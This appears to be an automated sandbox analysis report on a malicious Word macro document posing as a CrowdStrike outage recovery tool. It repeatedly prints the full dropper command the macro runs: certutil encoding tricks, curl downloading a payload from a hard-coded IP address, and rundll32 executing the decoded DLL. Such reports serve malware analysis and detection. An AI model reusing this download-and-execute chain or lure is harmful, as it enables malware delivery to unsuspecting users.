Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr; String found in binary or memory: https://curl.se/P
Source: curl.exe; String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr; String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr; String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe; String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr; String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe; String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr; String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe; String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr; String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr; String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr; String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown; Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.drOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)Jump to dropped file
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6529.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6690.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer7050.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer601A.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer60A7.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer6873.tmpJump to behavior
Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cer6529.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F3144A4
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRC0001.tmp.16.dr OLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr OLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F4A1F00 appears 134 times
Source: classification engine Classification label: mal88.expl.evad.winDOCM@51/26@4/3
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr OLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr OLE document summary: title field not present or empty
Source: C:\Windows\System32\cmd.exe Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............
Source: C:\Windows\System32\cmd.exe Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............
Source: C:\Windows\System32\certutil.exe Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.....................H.......<...............#........d..............................................
Source: C:\Windows\System32\certutil.exe Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.............................................#........d..............................................
Source: C:\Windows\System32\certutil.exe Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.............................................#........3)...............................!.............
Source: C:\Windows\System32\certutil.exe Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....
Source: C:\Windows\System32\certutil.exe Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exe Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....
Source: C:\Windows\System32\certutil.exe Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exe Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....
Source: C:\Windows\System32\certutil.exe Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....
Source: C:\Windows\System32\certutil.exe Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............
Source: C:\Windows\System32\certutil.exe Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............
Source: C:\Windows\System32\certutil.exe Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exe Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............
Source: C:\Windows\System32\certutil.exe Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................
Source: C:\Windows\System32\cmd.exe Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....
Source: C:\Windows\System32\certutil.exe Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exe Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....
Source: C:\Windows\System32\certutil.exe Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exe Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....
Source: C:\Windows\System32\certutil.exe Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....
Source: C:\Windows\System32\certutil.exe Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.....(........................|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exe Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.....(.......................'|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exe Console Write: ................................p.......(.P.....(.......................+|..............#........3).....................b.........7.............
Source: C:\Windows\System32\certutil.exe Console Write: ........................................(.P.....(......................./|..............#........3).............................................
Source: C:\Windows\System32\certutil.exe Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............
Source: C:\Windows\System32\certutil.exe Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................
Source: C:\Windows\System32\certutil.exe Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exe Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................
Source: C:\Windows\System32\certutil.exe Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\xcopy.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm ReversingLabs: Detection: 26%
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
